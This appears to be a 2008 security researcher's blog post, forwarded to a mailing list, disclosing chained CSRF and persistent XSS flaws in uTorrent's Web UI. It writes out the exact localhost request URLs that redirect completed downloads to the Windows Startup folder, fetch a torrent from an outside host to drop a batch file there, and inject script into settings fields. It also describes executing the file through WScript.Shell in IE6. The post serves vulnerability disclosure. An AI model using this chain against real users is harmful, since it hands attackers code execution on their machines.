I was going to keep this under my hat, so to speak, but this has forced my hand <http://packetstorm.austin2600.net/0804-exploits/torrent-pwnage.txt>.
<http://bp1.blogger.com/_E_3RnfZAsxE/SAqX9O0tixI/AAAAAAAAAII/6nsskS7Ooko/s1600-h/utorrent2yk4.png> I found a few CSRFs that when put together can make a pretty devastating attack against uTorrent's Web UI. Basically you can force uTorrent to move completed downloads to an arbitrary directory on their system, download arbitrary torrents, and completely pwn their box. This guy from rooksecurity.com <http://www.rooksecurity.com/blog/?p=10> had a couple interesting CSRFs that will change the username and password required for the Web UI. But, in order for the attacker to change the username and password the user must already be authenticated...so why go to all that trouble? For this attack we're going to assume that the user is already authenticated to uTorrent's Web UI. First of all you need a way to get a file on their computer. Not only that, but you want to be able to put that file in an arbitrary location of your choosing. To do that you need to turn on uTorrent's "Move completed downloads to" option. <http://bp2.blogger.com/_E_3RnfZAsxE/SAqZbe0tiyI/AAAAAAAAAIQ/CasF7v9mgvk/s1600-h/utorrent_1.png> Then you need to tell uTorrent what directory to move the completed file to. <http://bp0.blogger.com/_E_3RnfZAsxE/SAqZ1-0tizI/AAAAAAAAAIY/MpD5jZZGWrE/s1600-h/utorrent_2.png> The URL is cut off in the screenshot, so here's what's actually happening: http://localhost:14774/gui/?action=setsetting&s=dir_completed_download&v=C:\ Documents%20and%20Settings\All%20Users\Start%20Menu\Programs\Startup And this is what uTorrent's downloads preferences should now look like: <http://bp0.blogger.com/_E_3RnfZAsxE/SAqfj-0ti2I/AAAAAAAAAIw/1JlyWCL6kf8/s1600-h/utorrent_4.png> Completed files will be moved to the All Users Startup folder and once we can force them to download files we effectively have pwnage. I actually can force them to download a torrent by doing the following: http://localhost:14774/gui/?action=add-url&s=http://www.whatever.com/file.torrent Let's say that the torrent makes uTorrent download pwn.bat. Once the download finishes, pwn.bat resides in the Startup folder and gets executed when the user reboots. But wait, it gets worse... uTorrent has an XSS in the Web UI! Remember my previous two<http://r00tin.blogspot.com/2008/03/local-web-servers-are-dangerous.html> posts <http://r00tin.blogspot.com/2008/04/more-on-local-web-servers.html>about the dangers of local web servers? There are actually a few different spots to exploit this. Here are the PoC strings for the XSS vectors. http://localhost:14774/gui/?action=setsetting&s=tracker_ip&; v=%3Cscript%3Ealert('xss')%3C/script%3E http://localhost:14774/gui/?action=setsetting&s=ct_hist_comm&; v=%3Cscript%3Ealert('xss')%3C/script%3E http://localhost:14774/gui/?action=setsetting&s=dir_active_download&; v=%3Cscript%3Ealert('xss')%3C/script%3E <http://bp0.blogger.com/_E_3RnfZAsxE/SAqeg-0ti1I/AAAAAAAAAIo/6kmtkQekXCQ/s1600-h/utorrent_3.png> These are ALL persistent XSS attacks. To make the malicious Javascript fire you need to force the user's browser to visit http://localhost:14774/gui/?action=getsettings Remember, the "localhost" portion is VERY important because you want to perform a Cross ZONE Scripting attack, not just XSS. You could use "loopback" in place of "localhost" as well. So, moving on... <http://bp2.blogger.com/_E_3RnfZAsxE/R88A9HShf5I/AAAAAAAAACE/W0rUo65Z97M/s1600-h/local_intranet.png> If your target is using IE 6 then you don't have to force them to download a file to the Startup folder and wait for them to restart their box. All you have to do is force them to download the file to a location like C:\ and then execute it for them with the WScript.Shell ActiveXObject since your Javascript is in the Local Intranet zone. <http://bp1.blogger.com/_E_3RnfZAsxE/SAqdYO0ti0I/AAAAAAAAAIg/3AKPa1Rl1qY/s1600-h/stallowned.jpg> Pwn3d. Stay tuned, more torrent pwnage to come soon... --~--~---------~--~----~------------~-------~--~----~ 要向邮件组发送邮件,请发到 [email protected] 要退订此邮件,请发邮件至 [EMAIL PROTECTED] -~----------~----~----~----~------~----~------~--~---
